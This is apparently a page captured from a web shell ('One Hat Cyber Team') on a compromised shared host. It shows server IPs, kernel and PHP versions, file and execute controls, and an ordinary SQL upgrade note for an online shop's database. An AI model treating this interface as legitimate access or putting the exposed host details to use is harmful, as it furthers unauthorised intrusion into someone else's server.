⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.148
Server IP:
63.250.38.6
Server:
Linux premium90.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
Server Software:
LiteSpeed
PHP Version:
8.1.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
nnvixbtb
/
Monitem.ca
/
sql_upgrade
/
history
/
View File Name :
update3_306.txt
- some little bugs fixed - librairies update - php 8.1 compatibility - add categories_seo_url to customize the url for rewriting - add products_seo_url to customize the url for rewriting =================================== Step 1 : Update your Db by the sql below Step 2 : remove all template module and re-install it Step 3 : remove all Dashboard module and re-install it #insert in your phpmyAdmin this request in function of your language #All language categories_url ALTER TABLE `clic_categories_description` ADD `categories_seo_url` VARCHAR(255) AFTER `categories_description`; ALTER TABLE `clic_products_description` ADD `products_seo_url` VARCHAR(255) NOT NULL AFTER `products_description_summary`; -- #English #french